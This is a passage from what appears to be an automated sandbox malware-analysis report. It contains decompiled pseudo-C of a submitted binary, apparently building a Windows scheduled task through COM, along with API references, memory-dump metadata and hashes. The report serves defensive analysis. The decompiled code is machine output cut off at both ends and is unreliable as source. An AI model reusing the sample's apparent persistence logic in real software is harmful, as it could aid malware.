                          																												__eflags = _t693;
                          																												if(__eflags == 0) {
                          																													goto L164;
                          																												} else {
                          																													_v20 = 0x10;
                          																													asm("movups xmm0, [ebp-0xb0]");
                          																													asm("movups [ebp-0x78], xmm0");
                          																													_t694 = E0132EA8A(_t923, __eflags, 0xc);
                          																													_t957 = _t694;
                          																													_t989 = _t989 + 4;
                          																													_v108 = _t957;
                          																													_v20 = 0x11;
                          																													__eflags = _t957;
                          																													if(_t957 == 0) {
                          																														_t923 = 0;
                          																														__eflags = 0;
                          																													} else {
                          																														asm("xorps xmm0, xmm0");
                          																														asm("movq [esi], xmm0");
                          																														 *(_t957 + 8) = 0;
                          																														 *(_t957 + 4) = 0;
                          																														 *(_t957 + 8) = 1;
                          																														_t694 = E0132FAF0(_t780, 0x13836c2);
                          																														 *_t957 = _t694;
                          																													}
                          																													_v20 = 0x10;
                          																													_v108 = _t923;
                          																													__eflags = _t923;
                          																													if(_t923 == 0) {
                          																														goto L165;
                          																													} else {
                          																														_v20 = 0x12;
                          																														_v176 = _t902;
                          																														_t902 =  *_t923;
                          																														__eflags = _t902;
                          																														if(__eflags != 0) {
                          																															__imp__#149(_t902);
                          																															__imp__#150(_t902, _t694);
                          																															_v168 = _t694;
                          																															__eflags = _t694;
                          																															if(__eflags == 0) {
                          																																goto L162;
                          																															} else {
                          																																goto L126;
                          																															}
                          																														} else {
                          																															_v168 = _t902;
                          																															L126:
                          																															_v20 = 0x13;
                          																															asm("movups xmm0, [ebp-0xa0]");
                          																															asm("movups [ebp-0xc0], xmm0");
                          																															_t917 = E0132EA8A(_t923, __eflags, 0xc);
                          																															_t989 = _t989 + 4;
                          																															_v100 = _t917;
                          																															_v20 = 0x14;
                          																															__eflags = _t917;
                          																															if(_t917 == 0) {
                          																																_t902 = 0;
                          																																__eflags = 0;
                          																															} else {
                          																																asm("xorps xmm0, xmm0");
                          																																asm("movq [edi], xmm0");
                          																																 *(_t917 + 8) = 0;
                          																																 *(_t917 + 4) = 0;
                          																																 *(_t917 + 8) = 1;
                          																																 *_t917 = E0132FAF0(_t780, 0x13836c2);
                          																															}
                          																															_v20 = 0x13;
                          																															_v120 = _t902;
                          																															__eflags = _t902;
                          																															if(_t902 == 0) {
                          																																goto L162;
                          																															} else {
                          																																_v20 = 0x15;
                          																																_v160 = 8;
                          																																_t697 =  *_t902;
                          																																_v100 = _t697;
                          																																__eflags = _t697;
                          																																if(_t697 != 0) {
                          																																	__imp__#149(_t697);
                          																																	__imp__#150(_v100, _t697);
                          																																	_v152 = _t697;
                          																																	__eflags = _t697;
                          																																	if(_t697 == 0) {
                          																																		goto L166;
                          																																	} else {
                          																																		goto L132;
                          																																	}
                          																																} else {
                          																																	_v152 = _t697;
                          																																	L132:
                          																																	_v20 = 0x16;
                          																																	asm("movups xmm0, [ebp-0x90]");
                          																																	_v100 = _v40;
                          																																	_t699 = _v116;
                          																																	asm("movups [ebp-0xd8], xmm0");
                          																																	__eflags =  *((intOrPtr*)(_t699 + 0x14)) - 8;
                          																																	if(__eflags >= 0) {
                          																																		_t699 =  *_t699;
                          																																	}
                          																																	_t700 = E012F9580( &_v104, __eflags, _t699);
                          																																	_v20 = 0x17;
                          																																	_t701 =  *_t700;
                          																																	__eflags = _t701;
                          																																	if(_t701 == 0) {
                          																																		_t860 = 0;
                          																																		__eflags = 0;
                          																																	} else {
                          																																		_t860 =  *_t701;
                          																																	}
                          																																	asm("movups xmm0, [ebp-0x78]");
                          																																	asm("movups [eax], xmm0");
                          																																	_t1015 = _t989 - 0xfffffffffffffff0;
                          																																	asm("movups xmm0, [ebp-0xc0]");
                          																																	asm("movups [eax], xmm0");
                          																																	asm("movups xmm0, [ebp-0xd8]");
                          																																	asm("movups [eax], xmm0");
                          																																	_v100 = _v96(_v44, _t860, _v100, 6, 0,  &_v92);
                          																																	_t707 = _v104;
                          																																	_v116 = _t707;
                          																																	__eflags = _t707;
                          																																	if(_t707 != 0) {
                          																																		asm("lock xadd [eax+0x8], ecx");
                          																																		__eflags = (_t860 | 0xffffffff) == 1;
                          																																		if((_t860 | 0xffffffff) == 1) {
                          																																			__eflags = _t707;
                          																																			if(_t707 != 0) {
                          																																				_t866 =  *_t707;
                          																																				__eflags = _t866;
                          																																				if(_t866 != 0) {
                          																																					__imp__#6(_t866);
                          																																					_t707 = _v116;
                          																																					 *_t707 = 0;
                          																																				}
                          																																				_t867 =  *(_t707 + 4);
                          																																				__eflags = _t867;
                          																																				if(_t867 != 0) {
                          																																					L0132ECE6(_t867);
                          																																					_t707 = _v116;
                          																																					_t1015 = _t1015 + 4;
                          																																					 *(_v116 + 4) = 0;
                          																																				}
                          																																				_push(0xc);
                          																																				E0132EABA(_t707);
                          																																				_t1015 = _t1015 + 8;
                          																																			}
                          																																		}
                          																																		_v104 = 0;
                          																																	}
                          																																	_t708 =  &_v160;
                          																																	__imp__#9(_t708);
                          																																	asm("lock xadd [edi+0x8], eax");
                          																																	__eflags = (_t708 | 0xffffffff) == 1;
                          																																	if((_t708 | 0xffffffff) == 1) {
                          																																		_t728 =  *_t902;
                          																																		__eflags = _t728;
                          																																		if(_t728 != 0) {
                          																																			__imp__#6(_t728);
                          																																			 *_t902 = 0;
                          																																		}
                          																																		_t729 =  *(_t902 + 4);
                          																																		__eflags = _t729;
                          																																		if(_t729 != 0) {
                          																																			L0132ECE6(_t729);
                          																																			_t1015 = _t1015 + 4;
                          																																			 *(_t902 + 4) = 0;
                          																																		}
                          																																		_push(0xc);
                          																																		E0132EABA(_t902);
                          																																		_t1015 = _t1015 + 8;
                          																																	}
                          																																	_t918 = __imp__#9;
                          																																	_t712 =  *_t918( &_v176);
                          																																	asm("lock xadd [esi+0x8], eax");
                          																																	__eflags = (_t712 | 0xffffffff) == 1;
                          																																	if((_t712 | 0xffffffff) == 1) {
                          																																		_t724 =  *_t923;
                          																																		__eflags = _t724;
                          																																		if(_t724 != 0) {
                          																																			__imp__#6(_t724);
                          																																			 *_t923 = 0;
                          																																		}
                          																																		_t725 =  *(_t923 + 4);
                          																																		__eflags = _t725;
                          																																		if(_t725 != 0) {
                          																																			L0132ECE6(_t725);
                          																																			_t1015 = _t1015 + 4;
                          																																			 *(_t923 + 4) = 0;
                          																																		}
                          																																		_push(0xc);
                          																																		E0132EABA(_t923);
                          																																	}
                          																																	_v20 = 0xffffffff;
                          																																	 *_t918( &_v192);
                          																																	_t717 = _v44;
                          																																	 *((intOrPtr*)( *_t717 + 8))(_t717);
                          																																	_t719 = _v40;
                          																																	 *((intOrPtr*)( *_t719 + 8))(_t719);
                          																																	__eflags = _v100;
                          																																	if(_v100 < 0) {
                          																																		goto L73;
                          																																	} else {
                          																																		_t721 = _v92;
                          																																		 *((intOrPtr*)( *_t721 + 8))(_t721);
                          																																	}
                          																																	L74:
                          																																	 *[fs:0x0] = _v28;
                          																																	_pop(_t920);
                          																																	return E0132EA79(_v36 ^ _t963, _t920);
                          																																}
                          																															}
                          																														}
                          																													}
                          																												}
                          																											} else {
                          																												_t739 = _v60;
                          																												 *((intOrPtr*)( *_t739 + 8))(_t739);
                          																												goto L115;
                          																											}
                          																										}
                          																									}
                          																								}
                          																							}
                          																						}
                          																					} else {
                          																						_t755 = _v44;
                          																						 *((intOrPtr*)( *_t755 + 8))(_t755);
                          																						_t626 = _v52;
                          																						L71:
                          																						 *((intOrPtr*)( *_t626 + 8))(_t626);
                          																						_t480 = _v40;
                          																						goto L72;
                          																					}
                          																				}
                          																			}
                          																		}
                          																	}
                          																}
                          															}
                          														}
                          													}
                          												} else {
                          													L36:
                          													_t480 = _v44;
                          													goto L72;
                          												}
                          											} else {
                          												_t480 = _v48;
                          												goto L72;
                          											}
                          										}
                          									} else {
                          										asm("xorps xmm0, xmm0");
                          										asm("movq [esi], xmm0");
                          										 *(_t923 + 8) = 0;
                          										 *(_t923 + 4) = 0;
                          										 *(_t923 + 8) = 1;
                          										__imp__#2("\\");
                          										 *_t923 = _t483;
                          										if(_t483 == 0) {
                          											L162:
                          											E0132FAD0(0x8007000e);
                          											L163:
                          											E0132FAD0(0x8007000e);
                          											L164:
                          											E0132FAD0(0x8007000e);
                          											L165:
                          											E0132FAD0(0x8007000e);
                          											L166:
                          											E0132FAD0(0x8007000e);
                          											asm("int3");
                          											asm("int3");
                          											_push(_t963);
                          											_t965 = _t989;
                          											_push(0xffffffff);
                          											_push(0x1366305);
                          											_push( *[fs:0x0]);
                          											_t490 =  *0x13a4018; // 0x39cca9f6
                          											_t491 = _t490 ^ _t965;
                          											_v452 = _t491;
                          											_push(_t923);
                          											_push(_t902);
                          											_push(_t491);
                          											 *[fs:0x0] =  &_v448;
                          											_t903 = _v428;
                          											asm("xorps xmm0, xmm0");
                          											_v528 = _t903;
                          											_v560 = _t903;
                          											asm("movlpd [ebp-0x30], xmm0");
                          											E0134A72C(_t791, _t876,  &_v484);
                          											_push( &_v484);
                          											_push( &_v520);
                          											E0134A14E();
                          											_t498 = _v516;
                          											_t991 = _t989 - 0x70 + 0xc;
                          											__eflags = _t498 - 0x3b;
                          											if(_t498 != 0x3b) {
                          												_t499 = _t498 + 1;
                          												__eflags = _t499;
                          												_v100 = _t499;
                          											} else {
                          												_t602 = _v96;
                          												__eflags = _t602 - 0x17;
                          												if(_t602 >= 0x17) {
                          													_v96 = 0;
                          													_v100 = 0;
                          												} else {
                          													_v100 = 0;
                          													_v96 = _t602 + 1;
                          												}
                          											}
                          											_v44 = 0;
                          											_v40 = 0xf;
                          											_v60 = 0;
                          											_t924 = E012F57D0(_t780, _t876, _t903, 0x110);
                          											_v44 = 0x104;
                          											_v108 = _t924;
                          											_v40 = 0x10f;
                          											E013478D0(_t903, _t924, 0, 0x104);
                          											 *((char*)(_t924 + 0x104)) = 0;
                          											E012F5760( &_v60,  &_v108);
                          											_v24 = 0;
                          											__eflags = _v40 - 0x10;
                          											_t506 =  >=  ? _v60 :  &_v60;
                          											_t507 = E0134A70D( >=  ? _v60 :  &_v60, _v44, "%Y-%m-%dT%H:%M:%S",  &_v104);
                          											_t992 = _t991 + 0x28;
                          											_push(0);
                          											__eflags = _t507;
                          											if(_t507 == 0) {
                          												 *(_t903 + 0x10) = 0;
                          												 *(_t903 + 0x14) = 7;
                          												 *_t903 = 0;
                          												E012F51B0(_t780, _t903, _t903, _t924, 0x13836c0);
                          												_t799 = _v40;
                          												__eflags = _t799 - 0x10;
                          												if(_t799 >= 0x10) {
                          													_t804 = _t799 + 1;
                          													__eflags = _t804;
                          													_push(_t804);
                          													goto L186;
                          												}
                          												goto L187;
                          											} else {
                          												_push(_t507);
                          												_t805 =  &_v60;
                          												L190();
                          												__eflags = _v40 - 0x10;
                          												_t514 =  >=  ? _v60 :  &_v60;
                          												_t927 =  &((E012F5640( >=  ? _v60 :  &_v60))[_v44]);
                          												__eflags = _v40 - 0x10;
                          												_t517 =  >=  ? _v60 :  &_v60;
                          												_t905 = E012F5640( >=  ? _v60 :  &_v60);
                          												_v120 = 0;
                          												_v116 = 7;
                          												_v136 = 0;
                          												_t992 = _t992 + 8;
                          												_t521 = _t927 - _t905;
                          												_v140 = _t521;
                          												__eflags = _t521 - 7;
                          												if(_t521 <= 7) {
                          													L180:
                          													_v112 =  &_v136;
                          													_v24 = 1;
                          													__eflags = _t905 - _t927;
                          													while(_t905 != _t927) {
                          														E012FC140(_t780,  &_v136, _t905, _t927,  *_t905 & 0x0000ffff);
                          														_t905 =  &(_t905[1]);
                          														__eflags = _t905 - _t927;
                          													}
                          													_t903 = _v144;
                          													asm("movups xmm0, [ebp-0x74]");
                          													_v136 = 0;
                          													_t524 = _v40;
                          													 *(_t903 + 0x10) = 0;
                          													 *(_t903 + 0x14) = 0;
                          													asm("movups [edi], xmm0");
                          													asm("movq xmm0, [ebp-0x64]");
                          													asm("movq [edi+0x10], xmm0");
                          													_v120 = 0;
                          													_v116 = 7;
                          													__eflags = _t524 - 0x10;
                          													if(_t524 >= 0x10) {
                          														_push(_t524 + 1);
                          														L186:
                          														E012F56A0(_t780, _t903, _v60);
                          													}
                          													L187:
                          													 *[fs:0x0] = _v32;
                          													_pop(_t925);
                          													__eflags = _v36 ^ _t965;
                          													return E0132EA79(_v36 ^ _t965, _t925);
                          												} else {
                          													__eflags = _t521 - 0x7ffffffe;
                          													if(__eflags > 0) {
                          														E012F4B30(_t805, __eflags);
                          														goto L189;
                          													} else {
                          														_t591 = _t521 | 0x00000007;
                          														__eflags = _t591 - 0x7ffffffe;
                          														if(__eflags <= 0) {
                          															__eflags = _t591 - 0xa;
                          															_t592 =  <  ? 0xa : _t591;
                          														} else {
                          															_t592 = 0x7ffffffe;
                          														}
                          														_v108 = _t592;
                          														_t805 =  ~(0 | __eflags > 0x00000000) | _t592 + 0x00000001;
                          														__eflags = _t805 - 0x7fffffff;
                          														if(_t805 > 0x7fffffff) {
                          															L189:
                          															E012F4A60();
                          															asm("int3");
                          															asm("int3");
                          															asm("int3");
                          															asm("int3");
                          															asm("int3");
                          															asm("int3");
                          															asm("int3");
                          															asm("int3");
                          															asm("int3");
                          															asm("int3");
                          															_push(_t965);
                          															_t967 = _t992;
                          															_t995 = _t992 - 0x14;
                          															_push(_t780);
                          															_t782 = _t805;
                          															_t807 = _v568;
                          															_t369 = _t782 + 0x10; // 0x10
                          															_t531 = _t369;
                          															_push(_t927);
                          															_t928 =  *_t531;
                          															_v584 = _t531;
                          															__eflags = _t807 - _t928;
                          															if(_t807 > _t928) {
                          																_t877 =  *(_t782 + 0x14);
                          																_push(_t905);
                          																_v44 = _t877;
                          																_t907 = _t807 - _t928;
                          																_v40 = _t907;
                          																__eflags = _t907 - _t877 - _t928;
                          																if(_t907 > _t877 - _t928) {
                          																	__eflags = 0x7fffffff - _t928 - _t907;
                          																	if(__eflags < 0) {
                          																		E012F4B30(_t807, __eflags);
                          																		asm("int3");
                          																		asm("int3");
                          																		asm("int3");
                          																		asm("int3");
                          																		asm("int3");
                          																		asm("int3");
                          																		asm("int3");
                          																		asm("int3");
                          																		asm("int3");
                          																		asm("int3");
                          																		asm("int3");
                          																		asm("int3");
                          																		asm("int3");
                          																		asm("int3");
                          																		asm("int3");
                          																		asm("int3");
                          																		_push(_t967);
                          																		_t968 = _t995;
                          																		_push(_t782);
                          																		_t783 = _t807;
                          																		_t808 = _v600;
                          																		_push(_t928);
                          																		_push(_t907);
                          																		_t908 = _v604;
                          																		_t878 =  *(_t783 + 0x14);
                          																		_t929 =  *((intOrPtr*)(_t783 + 0x10));
                          																		_v628 = _t908;
                          																		_v617 = _t808;
                          																		_v632 = _t878;
                          																		__eflags = _t908 - _t878 - _t929;
                          																		if(_t908 > _t878 - _t929) {
                          																			__eflags = 0x7fffffff - _t929 - _t908;
                          																			if(__eflags < 0) {
                          																				E012F4B30(_t808, __eflags);
                          																				asm("int3");
                          																				asm("int3");
                          																				asm("int3");
                          																				asm("int3");
                          																				asm("int3");
                          																				asm("int3");
                          																				asm("int3");
                          																				asm("int3");
                          																				_push(_t968);
                          																				_push(_t808);
                          																				_push(_t929);
                          																				_push(2);
                          																				_t930 = _t808;
                          																				_v652 = _t930;
                          																				_t542 = E012F8A40(_t783, _v640, 0, L"PT");
                          																				 *(_t930 + 0x10) = 0;
                          																				__eflags = 0;
                          																				 *(_t930 + 0x14) = 0;
                          																				asm("movups xmm0, [eax]");
                          																				asm("movups [esi], xmm0");
                          																				asm("movq xmm0, [eax+0x10]");
                          																				asm("movq [esi+0x10], xmm0");
                          																				 *(_t542 + 0x10) = 0;
                          																				 *(_t542 + 0x14) = 7;
                          																				 *_t542 = 0;
                          																				return _t930;
                          																			} else {
                          																				_t812 = _t929 + _t908 | 0x0000000f;
                          																				__eflags = _t812 - 0x7fffffff;
                          																				if(_t812 <= 0x7fffffff) {
                          																					_v32 = _t878 >> 1;
                          																					__eflags = _t878 - 0x7fffffff - _v32;
                          																					if(_t878 <= 0x7fffffff - _v32) {
                          																						_t549 = _v32 + _t878;
                          																						__eflags = _t812 - _t549;
                          																						_t813 =  <  ? _t549 : _t812;
                          																					} else {
                          																						_t813 = 0x7fffffff;
                          																					}
                          																				} else {
                          																					_t813 = 0x7fffffff;
                          																				}
                          																				_t421 = _t813 + 1; // 0x80000000
                          																				_v32 = _t813;
                          																				_t551 = E012F57D0(_t783, _t878, _t908, _t421);
                          																				_v40 = _t551;
                          																				 *((intOrPtr*)(_t783 + 0x10)) = _t929 + _t908;
                          																				__eflags = _v48 - 0x10;
                          																				 *(_t783 + 0x14) = _v32;
                          																				_v32 = _v33;
                          																				_push(_t929);
                          																				if(_v48 < 0x10) {
                          																					_push(_t783);
                          																					_push(_t551);
                          																					E01345ED0();
                          																					_t932 = _t929 + _v40;
                          																					__eflags = _t932;
                          																					E013478D0(_t908, _t932, _v32, _t908);
                          																					 *((char*)(_t932 + _t908)) = 0;
                          																					E012F5760(_t783,  &_v40);
                          																					return _t783;
                          																				} else {
                          																					_t910 =  *_t783;
                          																					_push( *_t783);
                          																					_push(_t551);
                          																					E01345ED0();
                          																					_t934 = _t929 + _v40;
                          																					E013478D0( *_t783, _t934, _v32, _v44);
                          																					 *((char*)(_t934 + _v44)) = 0;
                          																					_t561 = _v48 + 1;
                          																					__eflags = _t561;
                          																					_push(_t561);
                          																					E012F56A0(_t783,  *_t783, _t910);
                          																					 *_t783 = _v40;
                          																					return _t783;
                          																				}
                          																			}
                          																		} else {
                          																			_v32 = _t783;
                          																			 *((intOrPtr*)(_t783 + 0x10)) = _t908 + _t929;
                          																			_t566 = _t783;
                          																			__eflags = _t878 - 0x10;
                          																			if(_t878 >= 0x10) {
                          																				_t566 =  *_t783;
                          																				_v32 =  *_t783;
                          																			}
                          																			E013478D0(_t908, _t566 + _t929, _t808, _t908);
                          																			_t819 = _v32 + _t908;
                          																			__eflags = _t819;
                          																			 *((char*)(_t819 + _t929)) = 0;
                          																			return _t783;
                          																		}
                          																	} else {
                          																		_t820 = _t807 | 0x0000000f;
                          																		__eflags = _t820 - 0x7fffffff;
                          																		if(_t820 <= 0x7fffffff) {
                          																			_v28 = _t877 >> 1;
                          																			__eflags = _t877 - 0x7fffffff - _v28;
                          																			if(_t877 <= 0x7fffffff - _v28) {
                          																				_t574 = _v28 + _t877;
                          																				__eflags = _t820 - _t574;
                          																				_t821 =  <  ? _t574 : _t820;
                          																			} else {
                          																				_t821 = 0x7fffffff;
                          																			}
                          																		} else {
                          																			_t821 = 0x7fffffff;
                          																		}
                          																		_t382 = _t821 + 1; // 0x80000000
                          																		_v28 = _t821;
                          																		_t576 = E012F57D0(_t782, _t877, _t907, _t382);
                          																		__eflags = _v44 - 0x10;
                          																		_v36 = _t576;
                          																		 *_v32 = _v16;
                          																		 *(_t782 + 0x14) = _v28;
                          																		_v32 = _v12;
                          																		_push(_t928);
                          																		if(_v44 < 0x10) {
                          																			_push(_t782);
                          																			_push(_t576);
                          																			E01345ED0();
                          																			_t937 = _t928 + _v36;
                          																			__eflags = _t937;
                          																			E013478D0(_t907, _t937, _v32, _t907);
                          																			 *((char*)(_t937 + _t907)) = 0;
                          																			return E012F5760(_t782,  &_v36);
                          																		} else {
                          																			_t914 =  *_t782;
                          																			_push( *_t782);
                          																			_push(_t576);
                          																			E01345ED0();
                          																			_t939 = _t928 + _v36;
                          																			E013478D0( *_t782, _t939, _v32, _v40);
                          																			 *((char*)(_t939 + _v40)) = 0;
                          																			_t585 = _v44 + 1;
                          																			__eflags = _t585;
                          																			_push(_t585);
                          																			E012F56A0(_t782,  *_t782, _t914);
                          																			_t587 = _v36;
                          																			 *_t782 = _t587;
                          																			return _t587;
                          																		}
                          																	}
                          																} else {
                          																	 *_v32 = _t807;
                          																	__eflags = _t877 - 0x10;
                          																	if(_t877 >= 0x10) {
                          																		_t782 =  *_t782;
                          																	}
                          																	_t941 = _t928 + _t782;
                          																	__eflags = _t941;
                          																	_t590 = E013478D0(_t907, _t941, _v12, _t907);
                          																	 *((char*)(_t941 + _t907)) = 0;
                          																	return _t590;
                          																}
                          															} else {
                          																__eflags =  *(_t782 + 0x14) - 0x10;
                          																if( *(_t782 + 0x14) >= 0x10) {
                          																	_t782 =  *_t782;
                          																}
                          																 *_t531 = _t807;
                          																 *((char*)(_t782 + _t807)) = 0;
                          																return _t531;
                          															}
                          														} else {
                          															_t829 = E012F57D0(_t780, _t876, _t905, _t805 + _t805);
                          															_v120 = _v140;
                          															_v116 = _v108;
                          															 *_t829 = _v136;
                          															_v112 = _t829;
                          															E012F5760( &_v136,  &_v112);
                          															_t992 = _t992 + 0xc;
                          															_v120 = 0;
                          															goto L180;
                          														}
                          													}
                          												}
                          											}
                          										} else {
                          											goto L13;
                          										}
                          									}
                          								}
                          							}
                          						}
                          					}
                          				}
                          			}
                          0x01303440
                          0x01303443
                          0x01303446
                          0x01303472
                          0x01303475
                          0x0130347a
                          0x0130347d
                          0x01303482
                          0x0130348b
                          0x0130348f
                          0x01303499
                          0x0130336b
                          0x0130336b
                          0x01303370
                          0x0130349c
                          0x00000000
                          0x01303376
                          0x01303376
                          0x01303379
                          0x0130337e
                          0x0130338c
                          0x0130338e
                          0x01303380
                          0x01303380
                          0x01303380
                          0x01303393
                          0x0130339e
                          0x013033a0
                          0x013033a6
                          0x013034a1
                          0x013034a1
                          0x013034a6
                          0x013034a7
                          0x013034a8
                          0x013034a9
                          0x013034aa
                          0x013034ab
                          0x013034ac
                          0x013034ad
                          0x013034ae
                          0x013034af
                          0x013034b0
                          0x013034b1
                          0x013034b3
                          0x013034b6
                          0x013034b7
                          0x013034b9
                          0x013034bc
                          0x013034bc
                          0x013034bf
                          0x013034c0
                          0x013034c2
                          0x013034c5
                          0x013034c7
                          0x013034df
                          0x013034e4
                          0x013034e7
                          0x013034ea
                          0x013034ee
                          0x013034f1
                          0x013034f3
                          0x01303526
                          0x01303528
                          0x013035fb
                          0x01303600
                          0x01303601
                          0x01303602
                          0x01303603
                          0x01303604
                          0x01303605
                          0x01303606
                          0x01303607
                          0x01303608
                          0x01303609
                          0x0130360a
                          0x0130360b
                          0x0130360c
                          0x0130360d
                          0x0130360e
                          0x0130360f
                          0x01303610
                          0x01303611
                          0x01303616
                          0x01303617
                          0x01303619
                          0x0130361c
                          0x0130361d
                          0x0130361e
                          0x01303621
                          0x01303626
                          0x0130362b
                          0x0130362e
                          0x01303631
                          0x01303634
                          0x01303636
                          0x01303679
                          0x0130367b
                          0x01303753
                          0x01303758
                          0x01303759
                          0x0130375a
                          0x0130375b
                          0x0130375c
                          0x0130375d
                          0x0130375e
                          0x0130375f
                          0x01303760
                          0x01303763
                          0x01303764
                          0x01303765
                          0x01303767
                          0x01303773
                          0x01303776
                          0x0130377b
                          0x01303782
                          0x01303784
                          0x0130378b
                          0x0130378e
                          0x01303791
                          0x01303796
                          0x0130379b
                          0x013037a2
                          0x013037a9
                          0x013037b2
                          0x01303681
                          0x01303684
                          0x01303687
                          0x0130368d
                          0x0130369a
                          0x013036a5
                          0x013036a7
                          0x013036b3
                          0x013036b5
                          0x013036b7
                          0x013036a9
                          0x013036a9
                          0x013036a9
                          0x0130368f
                          0x0130368f
                          0x0130368f
                          0x013036ba
                          0x013036bd
                          0x013036c1
                          0x013036c9
                          0x013036cf
                          0x013036d2
                          0x013036d9
                          0x013036e0
                          0x013036e3
                          0x013036e4
                          0x01303723
                          0x01303724
                          0x01303725
                          0x0130372a
                          0x0130372a
                          0x01303732
                          0x0130373a
                          0x01303740
                          0x01303750
                          0x013036e6
                          0x013036e6
                          0x013036e8
                          0x013036e9
                          0x013036ea
                          0x013036f2
                          0x013036f9
                          0x01303701
                          0x01303708
                          0x01303708
                          0x01303709
                          0x0130370b
                          0x01303716
                          0x01303720
                          0x01303720
                          0x013036e4
                          0x01303638
                          0x01303638
                          0x0130363e
                          0x01303641
                          0x01303643
                          0x01303646
                          0x01303648
                          0x0130364a
                          0x0130364a
                          0x01303656
                          0x01303661
                          0x01303661
                          0x01303666
                          0x0130366f
                          0x0130366f
                          0x0130352e
                          0x0130352e
                          0x01303531
                          0x01303537
                          0x01303544
                          0x0130354f
                          0x01303551
                          0x0130355d
                          0x0130355f
                          0x01303561
                          0x01303553
                          0x01303553
                          0x01303553
                          0x01303539
                          0x01303539
                          0x01303539
                          0x01303564
                          0x01303567
                          0x0130356b
                          0x01303576
                          0x0130357d
                          0x01303580
                          0x01303585
                          0x0130358c
                          0x0130358f
                          0x01303590
                          0x013035cd
                          0x013035ce
                          0x013035cf
                          0x013035d4
                          0x013035d4
                          0x013035dc
                          0x013035e4
                          0x013035f8
                          0x01303592
                          0x01303592
                          0x01303594
                          0x01303595
                          0x01303596
                          0x0130359e
                          0x013035a5
                          0x013035ad
                          0x013035b4
                          0x013035b4
                          0x013035b5
                          0x013035b7
                          0x013035bc
                          0x013035c2
                          0x013035ca
                          0x013035ca
                          0x01303590
                          0x013034f5
                          0x013034f8
                          0x013034fa
                          0x013034fd
                          0x013034ff
                          0x013034ff
                          0x01303505
                          0x01303505
                          0x0130350a
                          0x01303512
                          0x0130351c
                          0x0130351c
                          0x013034c9
                          0x013034c9
                          0x013034cd
                          0x013034cf
                          0x013034cf
                          0x013034d1
                          0x013034d4
                          0x013034dc
                          0x013034dc
                          0x013033ac
                          0x013033b5
                          0x013033ba
                          0x013033c0
                          0x013033c7
                          0x013033d1
                          0x013033d5
                          0x013033da
                          0x013033dd
                          0x00000000
                          0x013033dd
                          0x013033a6
                          0x01303370
                          0x01303369
                          0x0130280f
                          0x00000000
                          0x0130280f
                          0x01302809
                          0x013027dc
                          0x013027b2
                          0x013026d2
                          0x01302677
                          0x012faef3

                          APIs
                          • CoInitializeEx.OLE32(00000000,00000000,39CCA9F6), ref: 01302693
                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 013026AB
                          • CoCreateInstance.OLE32(01378F5C,00000000,00000001,01378F4C,?), ref: 013026CA
                          • VariantInit.OLEAUT32(?), ref: 013026ED
                          • VariantInit.OLEAUT32(?), ref: 0130270B
                          • VariantInit.OLEAUT32(?), ref: 01302722
                          • VariantInit.OLEAUT32(?), ref: 01302736
                          • VariantClear.OLEAUT32(?), ref: 01302789
                          • VariantClear.OLEAUT32(?), ref: 01302792
                          • VariantClear.OLEAUT32(?), ref: 0130279B
                          • VariantClear.OLEAUT32(?), ref: 013027AB
                          • SysAllocString.OLEAUT32(013836C4), ref: 013027FF
                          • SysFreeString.OLEAUT32(?), ref: 01302858
                          • SysFreeString.OLEAUT32(?), ref: 013028F0
                          • SysAllocString.OLEAUT32(Trigger1), ref: 01302A52
                          • SysFreeString.OLEAUT32(?), ref: 01302A9F
                          • SysFreeString.OLEAUT32(?), ref: 01302B29
                          • SysFreeString.OLEAUT32(00000000), ref: 01302CA0
                          • SysFreeString.OLEAUT32(00000000), ref: 01302E48
                          • SysAllocString.OLEAUT32(013836C0), ref: 01302EDC
                          • SysStringByteLen.OLEAUT32(00000008), ref: 01302F6E
                          • SysAllocStringByteLen.OLEAUT32(00000008,00000000), ref: 01302F76
                          • SysStringByteLen.OLEAUT32(00000008), ref: 01303048
                          • SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 01303052
                          • SysFreeString.OLEAUT32 ref: 013030C9
                          • VariantClear.OLEAUT32(?), ref: 0130310B
                          • SysFreeString.OLEAUT32(-00000001), ref: 01303123
                          • VariantClear.OLEAUT32(?), ref: 0130315E
                          • SysFreeString.OLEAUT32(-00000001), ref: 01303172
                          • VariantClear.OLEAUT32(?), ref: 013031AE
                          • _com_issue_error.COMSUPP ref: 013031E1
                          • _com_issue_error.COMSUPP ref: 013031EB
                          • _com_issue_error.COMSUPP ref: 013031F5
                          • _com_issue_error.COMSUPP ref: 013031FF
                          • _com_issue_error.COMSUPP ref: 01303209
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: String$Variant$Free$Clear$Alloc_com_issue_error$ByteInit$Initialize$CreateInstanceSecurity
                          • String ID: Trigger1
                          • API String ID: 1493749209-1869269927
                          • Opcode ID: 7df2d9b9501988a3753791602012e8e78ee2391cbb557f51992dc1bc7c47a2c1
                          • Instruction ID: 97e624fc45c7df7392e416699530eedfcce848b408bcc4b0ec01f803470733b4
                          • Opcode Fuzzy Hash: 7df2d9b9501988a3753791602012e8e78ee2391cbb557f51992dc1bc7c47a2c1
                          • Instruction Fuzzy Hash: D7826370E00219DFEB21DFA8C958B9EBBF4FF04718F148259E909AB291D775AD44CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 33%
                          			E012FAB30(void* __ebx, void* __edx, void* __edi) {
                          				intOrPtr _v4;
                          				intOrPtr _v8;
                          				char _v16;
                          				long _v24;
                          				intOrPtr _v28;
                          				signed int _v32;
                          				int _v36;
                          				int _v40;
                          				unsigned int _v44;
                          				char _v45;
                          				signed int _v48;
                          				int _v52;
                          				unsigned int _v56;
                          				int _v60;
                          				int _v64;
                          				int _v68;
                          				int _v72;
                          				int _v76;
                          				int _v80;
                          				int _v84;
